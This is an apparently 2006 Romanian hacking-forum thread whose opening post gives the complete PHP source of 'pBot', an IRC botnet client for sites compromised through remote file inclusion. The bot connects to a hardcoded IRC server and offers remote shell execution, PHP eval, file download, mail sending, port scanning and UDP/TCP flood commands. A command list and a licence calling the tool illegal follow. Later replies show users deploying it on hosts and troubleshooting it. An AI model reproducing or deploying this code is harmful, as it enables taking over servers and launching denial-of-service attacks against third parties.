Elias Posted June 29, 2006 Report Posted June 29, 2006 faceti un fisier .php introduceti codul de mai jos cu setarile voastre in acel fisier php , salvati dupa care puneti fisierul pe un server si lansati fisierul .<?set_time_limit(0);error_reporting(0);class pBot{ var $config = array("server"=>"64.18.128.86", "port"=>6667, "pass"=>"parola", "prefix"=>"NasaGov", "maxrand"=>8, "chan"=>"#nasa", "key"=>"pola", "modes"=>"+iB-x", "password"=>"parola", "trigger"=>"Elias-", "hostauth"=>"*" // * for any hostname ); var $users = array(); function start() { if(!($this->conn = fsockopen($this->config['server'],$this->config['port'],$e,$s,30))) $this->start(); $ident = ""; $alph = range("a","z"); for($i=0;$i<$this->config['maxrand'];$i++) $ident .= $alph[rand(0,25)]; if(strlen($this->config['pass'])>0) $this->send("PASS ".$this->config['pass']); $this->send("USER $ident 127.0.0.1 localhost :$ident"); $this->set_nick(); $this->main(); } function main() { while(!feof($this->conn)) { $this->buf = trim(fgets($this->conn,512)); $cmd = explode(" ",$this->buf); if(substr($this->buf,0,6)=="PING :") { $this->send("PONG :".substr($this->buf,6)); } if(isset($cmd[1]) && $cmd[1] =="001") { $this->send("MODE ".$this->nick." ".$this->config['modes']); $this->join($this->config['chan'],$this->config['key']); } if(isset($cmd[1]) && $cmd[1]=="433") { $this->set_nick(); } if($this->buf != $old_buf) { $mcmd = array(); $msg = substr(strstr($this->buf," :"),2); $msgcmd = explode(" ",$msg); $nick = explode("!",$cmd[0]); $vhost = explode("@",$nick[1]); $vhost = $vhost[1]; $nick = substr($nick[0],1); $host = $cmd[0]; if($msgcmd[0]==$this->nick) { for($i=0;$i<count($msgcmd);$i++) $mcmd[$i] = $msgcmd[$i+1]; } else { for($i=0;$i<count($msgcmd);$i++) $mcmd[$i] = $msgcmd[$i]; } if(count($cmd)>2) { switch($cmd[1]) { case "QUIT": if($this->is_logged_in($host)) { $this->log_out($host); } break; case "PART": if($this->is_logged_in($host)) { $this->log_out($host); } break; case "PRIVMSG": if(!$this->is_logged_in($host) && ($vhost == $this->config['hostauth'] || $this->config['hostauth'] == "*")) { if(substr($mcmd[0],0,1)==".") { switch(substr($mcmd[0],1)) { case "user": if($mcmd[1]==$this->config['password']) { $this->privmsg($this->config['chan'],"[2auth2]: $nick logged in"); $this->log_in($host); } else { $this->privmsg($this->config['chan'],"[2auth2]: Incorrect password from $nick"); } break; } } } elseif($this->is_logged_in($host)) { if(substr($mcmd[0],0,1)==".") { switch(substr($mcmd[0],1)) { case "restart": $this->send("QUIT :restart"); fclose($this->conn); $this->start(); break; case "mail": //mail to from subject message if(count($mcmd)>4) { $header = "From: <".$mcmd[2].">"; if(!mail($mcmd[1],$mcmd[3],strstr($msg,$mcmd[4]),$header)) { $this->privmsg($this->config['chan'],"[2mail2]: Unable to send"); } else { $this->privmsg($this->config['chan'],"[2mail2]: Message sent to 2".$mcmd[1]."2"); } } break; case "dns": if(isset($mcmd[1])) { $ip = explode(".",$mcmd[1]); if(count($ip)==4 && is_numeric($ip[0]) && is_numeric($ip[1]) && is_numeric($ip[2]) && is_numeric($ip[3])) { $this->privmsg($this->config['chan'],"[2dns2]: ".$mcmd[1]." => ".gethostbyaddr($mcmd[1])); } else { $this->privmsg($this->config['chan'],"[2dns2]: ".$mcmd[1]." => ".gethostbyname($mcmd[1])); } } break; case "info": $this->privmsg($this->config['chan'],"[2info2]: [2httpd2: ".$_SERVER['SERVER_SOFTWARE']. wrote: [2docroot2: ".$_SERVER['DOCUMENT_ROOT']. wrote: [2domain2: ".$_SERVER['SERVER_NAME']. wrote: [2admin2: ".$_SERVER['SERVER_ADMIN']. wrote: [2url2:".$_SERVER['REQUEST_URI']. wrote: "); break; case "cmd": if(isset($mcmd[1])) { $command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1); $this->privmsg($this->config['chan'],"[2cmd2]: $command"); $pipe = popen($command,"r"); while(!feof($pipe)) { $pbuf = trim(fgets($pipe,512)); if($pbuf != NULL) $this->privmsg($this->config['chan']," : $pbuf"); } pclose($pipe); } break; case "rndnick": $this->set_nick(); break; case "raw": $this->send(strstr($msg,$mcmd[1])); break; case "php": $eval = eval(substr(strstr($msg,$mcmd[1]),strlen($mcmd[1]))); break; case "exec": $command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1); $exec = shell_exec($command); $ret = explode("n",$exec); $this->privmsg($this->config['chan'],"[2exec2]: $command"); for($i=0;$i<count($ret);$i++) if($ret[$i]!=NULL) $this->privmsg($this->config['chan']," : ".trim($ret[$i])); break; case "pscan": // .pscan 127.0.0.1 6667 if(count($mcmd) > 2) { if(fsockopen($mcmd[1],$mcmd[2],$e,$s,15)) $this->privmsg($this->config['chan'],"[2pscan2]: ".$mcmd[1].":".$mcmd[2]." is 2open2"); else $this->privmsg($this->config['chan'],"[2pscan2]: ".$mcmd[1].":".$mcmd[2]." is 2closed2"); } break; case "ud.server": // .udserver <server> <port> [password] if(count($mcmd)>2) { $this->config['server'] = $mcmd[1]; $this->config['port'] = $mcmd[2]; if(isset($mcmcd[3])) { $this->config['pass'] = $mcmd[3]; $this->privmsg($this->config['chan'],"[2update2]: Changed server to ".$mcmd[1].":".$mcmd[2]." Pass: ".$mcmd[3]); } else { $this->privmsg($this->config['chan'],"[2update2]: Changed server to ".$mcmd[1].":".$mcmd[2]); } } break; case "download": if(count($mcmd) > 2) { if(!$fp = fopen($mcmd[2],"w")) { $this->privmsg($this->config['chan'],"[2download2]: Cannot download, permission denied."); } else { if(!$get = file($mcmd[1])) { $this->privmsg($this->config['chan'],"[2download2]: Unable to download from 2".$mcmd[1]."2"); } else { for($i=0;$i<=count($get);$i++) { fwrite($fp,$get[$i]); } $this->privmsg($this->config['chan'],"[2download2]: File 2".$mcmd[1]."2 downloaded to 2".$mcmd[2]."2"); } fclose($fp); } } break; case "die": $this->send("QUIT :Die command from $nick"); fclose($this->conn); exit; case "logout": $this->log_out($host); $this->privmsg($this->config['chan'],"[2auth2]: $nick logged out"); break; case "udpflood": if(count($mcmd)>4) { $this->udpflood($mcmd[1],$mcmd[2],$mcmd[3],$mcmd[4]); } break; case "tcpflood": if(count($mcmd)>5) { $this->tcpflood($mcmd[1],$mcmd[2],$mcmd[3],$mcmd[4],$mcmd[5]); } break; } } } break; } } } $old_buf = $this->buf; } $this->start(); } function send($msg) { fwrite($this->conn,"$msgrn"); } function join($chan,$key=NULL) { $this->send("JOIN $chan $key"); } function privmsg($to,$msg) { $this->send("PRIVMSG $to :$msg"); } function is_logged_in($host) { if(isset($this->users[$host])) return 1; else return 0; } function log_in($host) { $this->users[$host] = true; } function log_out($host) { unset($this->users[$host]); } function set_nick() { if(isset($_SERVER['SERVER_SOFTWARE'])) { if(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"apache")) $this->nick = "[A]"; elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"iis")) $this->nick = ""; elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"xitami")) $this->nick = "[X]"; else $this->nick = ""; } else { $this->nick = "[C]"; } $this->nick .= $this->config['prefix']; for($i=0;$i<$this->config['maxrand'];$i++) $this->nick .= mt_rand(0,9); $this->send("NICK ".$this->nick); } function udpflood($host,$packets,$packetsize,$delay) { $this->privmsg($this->config['chan'],"[2udpflood2]: Sending $packets packets to $host. Packet size: $packetsize"); $packet = ""; for($i=0;$i<$packetsize;$i++) $packet .= chr(mt_rand(1,256)); for($i=0;$i<$packets;$i++) { if(!$fp=fsockopen("udp://".$host,mt_rand(0,6000),$e,$s,5)) { $this->privmsg($this->config['chan'],"[2udpflood2]: Error: <$e>"); return 0; } else { fwrite($fp,$packet); fclose($fp); } sleep($delay); } $this->privmsg($this->config['chan'],"[2udpflood2]: Finished sending $packets packets to $host."); } function tcpflood($host,$packets,$packetsize,$port,$delay) { $this->privmsg($this->config['chan'],"[2tcpflood2]: Sending $packets packets to $host:$port. Packet size: $packetsize"); $packet = ""; for($i=0;$i<$packetsize;$i++) $packet .= chr(mt_rand(1,256)); for($i=0;$i<$packets;$i++) { if(!$fp=fsockopen("tcp://".$host,$port,$e,$s,5)) { $this->privmsg($this->config['chan'],"[2tcpflood2]: Error: <$e>"); return 0; } else { fwrite($fp,$packet); fclose($fp); } sleep($delay); } $this->privmsg($this->config['chan'],"[2tcpflood2]: Finished sending $packets packets to $host:$port."); }}$bot = new pBot;$bot->start();?> aici aveti comenzile necesare pt bot##======================================================================### pBot ~ A bot for exploiting PHP remote file inclusion vulnerabilities ## by V.S. ###======================================================================##= COMMANDS ============================================================================ .user <password> //login to the bot .logout //logout of the bot .die //kill the bot .restart //restart the bot .mail <to> <from> <subject> <msg> //send an email .dns <IP|HOST> //dns lookup .download <URL> <filename> //download a file .exec <cmd> // uses shell_exec() //execute a command .cmd <cmd> // uses popen() //execute a command .info //get system information .php <php code> // uses eval() //execute php code .tcpflood <target> <packets> <packetsize> <port> <delay> //tcpflood attack .udpflood <target> <packets> <packetsize> <delay> //udpflood attack .raw <cmd> //raw IRC command .rndnick //change nickname .pscan <host> <port> //port scan .ud.server <newhost> <newport> [newpass] //change IRC server---------------------------------------------------------------------------------------= LICENCE =========================================================== Do whatever the ~censored~ you want with this, legitimate or not. Modify it, rewrite it, rename it, I honestly don't give a crap. Just don't bother me if you ~censored~ it up.---------------------------------------------------------------------= DISCLAIMER ======================================================== This type of application is illegal, but go nuts. What do I care? Quote
soar3 Posted July 5, 2006 Report Posted July 5, 2006 Merge si daca il pun pe un host moca si ii dau drumu,gen lx.ro sau 3x.ro sau lxhost.com.....???? Quote
Criminal Posted July 5, 2006 Report Posted July 5, 2006 dar ce face? floodeaza sau ce? :@ nu prea le am cu mircu' Quote
ghici Posted July 5, 2006 Report Posted July 5, 2006 tu orb la tine? .user <password> //login to the bot.logout //logout of the bot.die //kill the bot.restart //restart the bot.mail <to> <from> <subject> <msg> //send an email.dns <IP|HOST> //dns lookup.download <URL> <filename> //download a file.exec <cmd> // uses shell_exec() //execute a command.cmd <cmd> // uses popen() //execute a command.info //get system information.php <php code> // uses eval() //execute php code.tcpflood <target> <packets> <packetsize> <port> <delay> //tcpflood attack.udpflood <target> <packets> <packetsize> <delay> //udpflood attack.raw <cmd> //raw IRC command.rndnick //change nickname.pscan <host> <port> //port scan.ud.server <newhost> <newport> [newpass] //change IRC server Quote
mario23 Posted July 12, 2006 Report Posted July 12, 2006 zi mi si mie cum iau op de la botu asta, daca se poate asa ceva? Quote
bai3tzash Posted July 23, 2006 Report Posted July 23, 2006 ba se poate lua op..... cu comanda .raw poti executa orice comanda de ex: .raw mode #canal +o nick numa` are un mic bug, sau poate asa a fost facut: la trimiterea de mesaje private sau pe chan, scrie doar ultimul cuvant Quote
mario23 Posted July 23, 2006 Report Posted July 23, 2006 Merci bai3tzash functioneaza perfect botul asta, se pare ca era greseala mea nu puneam # in fata la canal. Quote
SpLo1T Posted August 8, 2006 Report Posted August 8, 2006 Elias msssssssssssssssssssssssss muult ! unul dintre cele mai bune topic`uri de pe forum [parerea mea] Quote
Frankee Posted October 13, 2006 Report Posted October 13, 2006 Super interesant ... nice work Elias ... chiar ma gandeam cum as putea ridica boti fara sa deschid serveru ... sau pe Nologinuri merci mult ... Quote
Danny Posted November 1, 2006 Report Posted November 1, 2006 Trebuia sa puneti si un manul de folosire Deci am facut *.php ... acum cum il rulez? Il pun pe un ftp si il rulez sau cum? Quote
virusz Posted November 1, 2006 Report Posted November 1, 2006 hmm.....Il pui sus pe server... il rulezi! ce mare lucru...un exemplu: il pun prin ftp pe 99.22.33.1, asta are 80 deschis, trebuie sa aiba suport php...ca sa il pornesti:http://99.22.33.1/bot.php dak l-ai configurat cum tre si serveru e oke... o sa iti mearga.. deci MERGE.. Quote
Danny Posted November 1, 2006 Report Posted November 1, 2006 La mine zice asa : PHP Parse error: parse error, unexpected T_VARIABLE, expecting ';' in /home/alungatu/bot.php on line 72 Quote
YceFire Posted November 1, 2006 Report Posted November 1, 2006 Scarto wrote: La mine zice asa : PHP Parse error: parse error, unexpected T_VARIABLE, expecting ';' in /home/alungatu/bot.php on line 72In afara de fatpul ca e alt host, eroare e aceeasi :@ , si l'am incercat pe mai multe hosturi Quote
BizZaroO Posted November 2, 2006 Report Posted November 2, 2006 cum ma conectez la bot. Sunt mai prost la cap irc astept ajutor Quote
BizZaroO Posted November 2, 2006 Report Posted November 2, 2006 Parse error: syntax error, unexpected T_VARIABLE, expecting ';' in /home/www/free/xhost.ro/aresinthegame.xhost.ro/index.php on line 71asta imi apare cand incerc sa rulez pagina. ideea e urmatoarea: am 2 fisiere index. 1 e index.html si unu .php. Cel php e facut de mine (dupa codul afisat in prima pagina) cel html e facut de aia... ma rog cel pe care il stie toata lumea. Acum cum fac sa ma conectez??????? cum fac sa imi apara cum ii apare lui shoker? explicatii pls Quote
